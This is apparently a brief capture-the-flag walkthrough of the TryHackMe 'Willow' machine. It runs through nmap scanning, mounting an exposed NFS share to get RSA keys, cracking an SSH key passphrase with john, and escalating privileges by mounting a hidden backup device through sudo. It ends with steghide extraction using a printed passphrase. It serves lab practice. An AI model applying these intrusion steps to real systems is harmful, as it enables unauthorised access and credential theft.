Willow

Scanning

furious 10.10.192.59
nmap -sC -sV -p 22,111,2049,80 10.10.192.59 -n -Pn -oN targeted

012116.png

80

000534.png

we try with hexadecimal to ascii

005736.png

2049

showmount -e 10.10.192.59
Export list for 10.10.192.59:
/var/failsafe *
mkdir /mnt/Willow
mount -t nfs 10.10.192.59:/var/failsafe /mnt/Willow -o nolock
ls /mnt/Willow
# rsa_keys
cp /mnt/Willow/rsa_keys .
cat rsa_keys

014527.png

I'm using https://www.aldeid.com/wiki/TryHackMe-Willow to decrypt the message that we have found, with the Private key Pair from rsa_keys.

010732.png

sudo ssh -i id_rsa 10.10.192.59

014038.png

locate 2john| grep ssh
# /usr/share/john/ssh2john.py
/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

012941.png

Now we could enter with ssh

013542.png

user flag

we code the image with base 64 to save the file in user.64 and decode it in our machine

# victim machine
base64 user.jpg
# attacker machine
base64 -d user.64 > user.png
fim user.png

013158.png

Privilege Scalation

sudo -l

213459.png

ls -l /dev

225800.png

mkdir bkup
sudo /bin/mount /dev/hidde_backup /home/willow/bkup
cd bkup
cat creds.txt

225303.png

Now we have to enter to root with su root. But when we see the root.txt file we see that we have to find another file…

225306.png

we use the passphrase 7QvbvBTvwPspUK in the user.png file that we found before:

steghide extract -sf user.png

225411.png